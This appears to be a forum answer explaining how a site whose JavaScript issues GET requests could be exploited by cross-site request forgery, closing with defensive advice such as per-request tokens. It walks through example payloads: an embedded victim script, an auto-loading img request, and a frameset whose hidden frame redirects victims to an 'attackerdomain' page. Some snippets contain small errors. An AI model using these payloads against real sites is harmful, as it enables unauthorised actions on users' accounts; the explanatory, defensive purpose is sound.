Firstly, I can see that this is a CSRF vulnerability, if you website has a JS which executes a GET request, then I see the following scenario:
1.-An attacker can see and analyze your JS code and use it for his/her purposes.
2.-The attacker could be build a website which includes your JS.
<script src="http//:victimdomain/js/myscript.js"></script>
3.-The website contains a tag which executes the JS so the end user will not realize it.
<body onload="sendRequest("Bob");">
4.-A problem could be if the JS code redirect to another site, the victim would know that something bad has happened. The attacker needs to know how the JS code handles the response and try to modify to keep to the victim on the current web site, maybe he/she needs to type a JS function for this purpose.
5.-Finally, the attacker just sends his exploit (malicious website) to the victims and the they couldn't realize about what happen.
In this way, a CSRF attack could be easy to exploit it. Now, if you wouldn't have a JS code to execute a GET request and the attacker would have more options to exploit, for example, as you said, an attacker could do something like this:
<img src="http//:victimdomain/action?param=Bob" />
But, as I mentioned before, the GET Request could redirect to another site, then this could be a good solution for an attacker:
1.-Build a website with two iframes, something like this:
<html>
<head>
<title>ejemplo CSRF</title>
</head>
<frameset cols="1%, 99%">
<frame src="exploit.html">
<frame src="empty.html">
</frameset>
</html>
2.-exploit.html will contain the Get request.
<img src="http//:victimdomain/action?param=Bob" />
3.-empty.html will contain the following code:
<html>
<head>
<title>ejemplo CSRF</title>
<script>
function peticion() {
setTimeout (function() {
if (top != self) top.location.href = "http://attackerdomain/falsewebsite";
}, 1000);
}
</script>
</head>
<body onload="redirect();">
</body>
</html>
4.-The JS function validates the current window, if the topmost window is different than the current window (in this case the empty.html), then it redirects to an attacker's website and finally, the victim will not realize about what happen.
So, I think your website could be vulnerable to CSRF and there are ways to exploit it (not only my examples), so you should protects your website. My recommendations are:
- Use an unpredictable token for each request.
- If you JS code contains part of your website's business logic, then you should protects it, apply access control, only authorized users can use that JS code, and obfuscate it.
I hope this information helps you.